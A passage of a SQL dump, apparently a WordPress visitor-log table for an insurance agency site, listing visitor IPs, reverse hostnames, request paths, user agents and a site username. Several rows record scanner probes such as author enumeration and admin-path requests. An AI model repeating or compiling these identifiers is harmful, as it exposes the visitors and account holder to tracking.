Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22301,'0b_4ccdabdad44e78bbb5d427e663773d07','1461856400','5.153.233.130','5.153.233.130','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(22302,'0b_4ccdabdad44e78bbb5d427e663773d07','1461856436','5.153.233.130','5.153.233.130','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(22304,'0b_4ccdabdad44e78bbb5d427e663773d07','1461856465','5.153.233.130','5.153.233.130','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(22307,'0b_cb5be95173a5b73036dd180417c83cfc','1461857510','66.249.64.24','crawl-66-249-64-24.googlebot.com','/illustration.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22308,'0b_136da0732686d8fec275a23e499a0f9d','1461861729','180.76.15.148','baiduspider-180-76-15-148.crawl.baidu.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(22310,'0b_6ba5742e05824205c14a1e8afea1649e','1461862081','192.227.237.211','192-227-237-211-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.3.4000 Chrome/30.0.1599.101 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 30','us','','','','','','','0','0',0),(22313,'0b_039c8c926928957b4ba49cd704dd7d69','1461863332','66.249.83.141,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(22316,'0b_5513106c5d0ce43424ee5a28a050c1a9','1461863333','66.249.83.144,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(22319,'0b_3df2af90395baaeb997d7444946809c2','1461864215','45.79.89.188','li1188-188.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(22322,'0b_81ef68f55581cc55e2c43b6e09414d8b','1461872715','24.102.99.156','cpe-24-102-99-156.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 49','us','','Google','','','','','0','0',0),(22325,'0b_81ef68f55581cc55e2c43b6e09414d8b','1461872717','24.102.99.156','cpe-24-102-99-156.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','','','','','','','0','0',0),(22328,'0b_a9ad7ae5fd5eff73f01e81d6d9d54d9d','1461876146','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MALCJS; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(22331,'0b_a9ad7ae5fd5eff73f01e81d6d9d54d9d','1461876148','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MALCJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(22334,'0b_a9ad7ae5fd5eff73f01e81d6d9d54d9d','1461876150','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MALCJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(22335,'0b_520630e880366026f7d36967bcf9a123','1461876314','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(22337,'0b_520630e880366026f7d36967bcf9a123','1461876316','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(22338,'0b_a9ad7ae5fd5eff73f01e81d6d9d54d9d','1461876329','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MALCJS; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(22340,'0b_520630e880366026f7d36967bcf9a123','1461876411','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(22341,'0b_520630e880366026f7d36967bcf9a123','1461876421','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(22344,'0b_345acffc64a37feeeb428a02a9850f9c','1461876965','144.76.100.175','blexhn52.webmeup.com','/robots.txt','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(22347,'0b_345acffc64a37feeeb428a02a9850f9c','1461876967','144.76.100.175','blexhn52.webmeup.com','/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(22349,'0b_345acffc64a37feeeb428a02a9850f9c','1461876992','144.76.100.175','blexhn52.webmeup.com','/about-us/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(22352,'0b_7803b260f7f7ae0d7b889ba003ba5593','1461876983','108.171.132.166,12.31.202.193','12.31.202.193','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','','Google','','','','','0','0',0),(22353,'0b_7803b260f7f7ae0d7b889ba003ba5593','1461876994','108.171.132.166,12.31.202.193','12.31.202.193','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(22356,'0b_345acffc64a37feeeb428a02a9850f9c','1461877013','144.76.100.175','blexhn52.webmeup.com','/agent-tools/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(22359,'0b_345acffc64a37feeeb428a02a9850f9c','1461877029','144.76.100.175','blexhn52.webmeup.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(22361,'0b_372a65ce1776bf04e786e19d13876d0c','1461877029','157.55.39.249','msnbot-157-55-39-249.search.msn.com','[404] /pdf/avoid_1099.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22364,'0b_345acffc64a37feeeb428a02a9850f9c','1461877052','144.76.100.175','blexhn52.webmeup.com','/carriers/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(22365,'0b_345acffc64a37feeeb428a02a9850f9c','1461877072','144.76.100.175','blexhn52.webmeup.com','/case-status/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(22368,'0b_345acffc64a37feeeb428a02a9850f9c','1461877094','144.76.100.175','blexhn52.webmeup.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(22371,'0b_345acffc64a37feeeb428a02a9850f9c','1461877108','144.76.100.175','blexhn52.webmeup.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(22374,'0b_345acffc64a37feeeb428a02a9850f9c','1461877127','144.76.100.175','blexhn52.webmeup.com','/contact/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(22376,'0b_345acffc64a37feeeb428a02a9850f9c','1461877149','144.76.100.175','blexhn52.webmeup.com','/forms/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(22377,'0b_345acffc64a37feeeb428a02a9850f9c','1461877167','144.76.100.175','blexhn52.webmeup.com','/igo/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(22380,'0b_345acffc64a37feeeb428a02a9850f9c','1461877189','144.76.100.175','blexhn52.webmeup.com','/insentives/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(22382,'0b_72203f71bad0315fe1f4716748d0c5d4','1461877206','144.76.100.175','blexhn52.webmeup.com','/licensing-contracting/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(22383,'0b_72203f71bad0315fe1f4716748d0c5d4','1461877246','144.76.100.175','blexhn52.webmeup.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(22386,'0b_72203f71bad0315fe1f4716748d0c5d4','1461877289','144.76.100.175','blexhn52.webmeup.com','/register/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(22388,'0b_72203f71bad0315fe1f4716748d0c5d4','1461877301','144.76.100.175','blexhn52.webmeup.com','/term-quotes/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(22389,'0b_72203f71bad0315fe1f4716748d0c5d4','1461877315','144.76.100.175','blexhn52.webmeup.com','/?page_id=169','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(22392,'0b_72203f71bad0315fe1f4716748d0c5d4','1461877334','144.76.100.175','blexhn52.webmeup.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(22395,'0b_72203f71bad0315fe1f4716748d0c5d4','1461877349','144.76.100.175','blexhn52.webmeup.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(22398,'0b_74a159ebb384d4c146c7d0ae9beccfe6','1461877933','192.3.130.108','host.colocrossing.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(22400,'0b_c72259b7b76a54c0460a57baa5181478','1461880796','100.43.81.146','spider-100-43-81-146.yandex.com','/case-status/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(22403,'0b_fdb3f389dcee5e847fa6f532d4fc6617','1461886015','151.80.41.169','mansfield.didici.be','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(22406,'0b_fdb3f389dcee5e847fa6f532d4fc6617','1461886023','151.80.41.169','mansfield.didici.be','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(22407,'0b_3b37db285aa136316f7f98c0d38c30e2','1461886953','66.249.64.241','crawl-66-249-64-241.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(22409,'0b_5fc673c799a2bfd02643a2382259ddfb','1461886954','66.249.64.166','crawl-66-249-64-166.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(22410,'0b_8275342be54d460a1c2a611f241138f6','1461888443','207.46.13.82','msnbot-207-46-13-82.search.msn.com','/SSO/235_14.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22413,'0b_28031843020b981e003a91aa617b0415','1461888499','66.249.64.154','crawl-66-249-64-154.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22415,'0b_8275342be54d460a1c2a611f241138f6','1461889287','207.46.13.82','msnbot-207-46-13-82.search.msn.com','/forms','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(22418,'0b_8275342be54d460a1c2a611f241138f6','1461889298','207.46.13.82','msnbot-207-46-13-82.search.msn.com','/forms/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(22419,'0b_47cf37affce0d57a7328fe1fc5a02296','1461889739','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22422,'0b_d9c813bdb5f713b56cf4a3268e6ad1d2','1461891553','46.118.156.3','sol-fttb.3.156.118.46.sovam.net.ua','/','Mozilla/0.91 Beta (Windows)','http://tvand.ru/','',0,'','','ua','','','','','','','0','0',0),(22424,'0b_095d5c0dd2bf16e30e1f2641ef850694','1461891553','46.118.156.3','sol-fttb.3.156.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0','http://royal-investments.net/','',0,'WinXP','Opera 9','ua','','','','','','','0','0',0),(22425,'0b_59e3fc9ac6e6807549dd7e58dde0ffaa','1461893862','188.166.35.79','188.166.35.79','/robots.txt','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(22427,'0b_59e3fc9ac6e6807549dd7e58dde0ffaa','1461893872','188.166.35.79','188.166.35.79','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(22428,'0b_eaf6dc45e5cbb5364f071b86ddd93705','1461894805','50.19.172.247','ec2-50-19-172-247.compute-1.amazonaws.com','/robots.txt','CCBot/2.0 (http://commoncrawl.org/faq/)','','',0,'','','us','','','commoncrawl','','','','0','0',0),(22431,'0b_eaf6dc45e5cbb5364f071b86ddd93705','1461894806','50.19.172.247','ec2-50-19-172-247.compute-1.amazonaws.com','/','CCBot/2.0 (http://commoncrawl.org/faq/)','','',0,'','','us','','','commoncrawl','','','','0','0',0),(22433,'0b_b8658df61b179a93ae20c48fae48b9f8','1461896622','180.76.15.10','baiduspider-180-76-15-10.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(22434,'0b_ed5bda018d23fc5ff0110b0424223c40','1461896623','180.76.15.159','baiduspider-180-76-15-159.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(22437,'0b_bdcddfbc148d29cbef60e90bb26d6755','1461904152','66.249.64.160','crawl-66-249-64-160.googlebot.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22439,'0b_bdcddfbc148d29cbef60e90bb26d6755','1461904153','66.249.64.166','crawl-66-249-64-166.googlebot.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22442,'0b_5793d107e989f7e5980adc1e7ffbd47e','1461907222','5.149.254.109','5.149.254.109','/wordpress/','Mozilla/4.0 (compatible MSIE 8.0 Windows NT 5.1 Trident/4.0 MRSPUTNIK 2, 3, 0, 301 MRA 5.7 (build 03797) .NET CLR 1.1.4322)','','',0,'WinXP','IE 8','','','','','','','','0','0',0),(22445,'0b_4c1ac54d3baa6cb37a8e72ac35a26341','1461907350','157.55.39.38','msnbot-157-55-39-38.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(22446,'0b_cc9520c4fbf83255f6e5fdd33cd2b007','1461907381','207.46.13.109','msnbot-207-46-13-109.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(22449,'0b_a8e99262a3f68aba7a798afa02f7cd22','1461908001','68.64.168.226','363','/administrator/index.php','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','3','0',0),(22452,'0b_a8e99262a3f68aba7a798afa02f7cd22','1461908006','68.64.168.226','363','/administrator/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','3','0',0),(22454,'0b_75442d6e2f03e2451e65d142133dd210','1461910508','46.229.167.149','46.229.167.149','/','Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0','','',0,'Win2000','Firefox 5','','','','','','','','0','0',0),(22455,'0b_3fd7614ed7db31017f27de1aa9c69b11','1461910751','46.229.167.149','46.229.167.149','/','Mozilla/5.0 (Windows NT 6.1; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre','','',0,'Win7','Firefox 4','','','','','','','','0','0',0),(22457,'0b_e788f6ddee6d713ba80d66ce9a54ea69','1461912321','54.224.48.15','ec2-54-224-48-15.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36','','',0,'Win8','Chrome 34','','','','','','','','0','0',0),(22458,'0b_5f6605f30971186c551021177fea25ac','1461912322','54.224.48.15','ec2-54-224-48-15.compute-1.amazonaws.com','/','Go 1.1 package http','http://empireins.com','',0,'','','','','','Go','','','','0','0',0),(22460,'0b_3936347bd102bbb31ad0430d307e87d2','1461912847','194.153.113.35','194.153.113.35','/robots.txt','Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(22461,'0b_20e65f15f30359c526ddf8e6245d6de6','1461913250','54.167.214.110','ec2-54-167-214-110.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','','',0,'Win8','Chrome 32','us','','','','','','','0','0',0),(22463,'0b_20e65f15f30359c526ddf8e6245d6de6','1461913251','54.167.214.110','ec2-54-167-214-110.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 32','us','','','','','','','0','0',0),(22466,'0b_5fa62df72fe16a1d89b4fb644b143e8c','1461914267','54.162.156.69','ec2-54-162-156-69.compute-1.amazonaws.com','/igo/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36','','',0,'Win8','Chrome 34','','','','','','','','0','0',0),(22467,'0b_99dd04495c3844791b522148a72dd51a','1461914268','54.162.156.69','ec2-54-162-156-69.compute-1.amazonaws.com','/igo/','Go 1.1 package http','http://empireins.com/igo/','',0,'','','','','','Go','','','','0','0',0),(22469,'0b_5fa62df72fe16a1d89b4fb644b143e8c','1461914329','54.162.156.69','ec2-54-162-156-69.compute-1.amazonaws.com','/case-status/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36','','',0,'Win8','Chrome 34','','','','','','','','0','0',0),(22470,'0b_99dd04495c3844791b522148a72dd51a','1461914329','54.162.156.69','ec2-54-162-156-69.compute-1.amazonaws.com','/case-status/','Go 1.1 package http','http://empireins.com/case-status/','',0,'','','','','','Go','','','','0','0',0),(22473,'0b_25815453d058a375c48d5bae5e3b6008','1461914553','54.158.0.77','ec2-54-158-0-77.compute-1.amazonaws.com','/igo/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','','',0,'Win8','Chrome 32','us','','','','','','','0','0',0),(22476,'0b_f9a91077af88bd92089d646630621541','1461915533','54.158.0.77','ec2-54-158-0-77.compute-1.amazonaws.com','/case-status/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','','',0,'Win8','Chrome 32','us','','','','','','','0','0',0),(22478,'0b_610995eff352e14c8bda243ef3679569','1461917841','66.249.64.154','crawl-66-249-64-154.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22481,'0b_610995eff352e14c8bda243ef3679569','1461917842','66.249.64.154','crawl-66-249-64-154.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22484,'0b_0b015a54456af7dfa4b9b083337f708f','1461922768','100.43.91.26','spider-100-43-91-26.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(22487,'0b_d3b6d4e21781063db65c20dd6c148b71','1461922770','141.8.143.235','spider-141-8-143-235.yandex.com','/case-status/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(22488,'0b_c6473f642999bf0139aed59de62eaf1e','1461922856','45.35.105.105','45.35.105.105','/about-us/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(22490,'0b_d12a3cfd103897e7f815cdbf1959a7b8','1461930977','178.137.87.242','178-137-87-242-lvv.broadband.kyivstar.net','/robots.txt','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','','','','Unknown Spider','','','','3','0',0),(22491,'0b_d12a3cfd103897e7f815cdbf1959a7b8','1461930978','178.137.87.242','178-137-87-242-lvv.broadband.kyivstar.net','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','','','','Unknown Spider','','','','3','0',0),(22494,'0b_d12a3cfd103897e7f815cdbf1959a7b8','1461930981','178.137.87.242','178-137-87-242-lvv.broadband.kyivstar.net','/','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','','','','','','','','3','0',0),(22496,'0b_eb2115e268b66f030713866dc1b8d2cb','1461933079','195.154.33.129','195-154-33-129.rev.poneytelecom.eu','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36','','',0,'Win7','Chrome 34','eu','','','','','','','0','0',0),(22497,'0b_afae9847623b5c091514f5ea230e2621','1461935515','51.254.215.130','130.ip-51-254-215.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(22499,'0b_afae9847623b5c091514f5ea230e2621','1461935518','51.254.215.130','130.ip-51-254-215.eu','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(22500,'0b_46b0b880a2f616c06401817826ff5797','1461937853','70.184.148.121','wsip-70-184-148-121.rn.hr.cox.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi3qvDw_rPMAhXFWCYKHe5aB14QFggeMAA&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&sig2=g4tqj8xYhNvFFHM5l_FlaQ','',0,'Win10','','us','1600 x 900','','','','','','0','0',0),(22503,'0b_46b0b880a2f616c06401817826ff5797','1461937857','70.184.148.121','wsip-70-184-148-121.rn.hr.cox.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win10','','us','1600 x 900','','','','','','0','0',0),(22505,'0b_46b0b880a2f616c06401817826ff5797','1461937867','70.184.148.121','wsip-70-184-148-121.rn.hr.cox.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win10','','us','1600 x 900','','','','','','0','0',0),(22508,'0b_288f388ff8ef0ba7d03882cda3cf0771','1461938887','188.166.7.103','188.166.7.103','/robots.txt','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(22509,'0b_288f388ff8ef0ba7d03882cda3cf0771','1461938897','188.166.7.103','188.166.7.103','/contact/','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(22511,'0b_5092a695909ce156e265dde07f3298d9','1461940059','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, 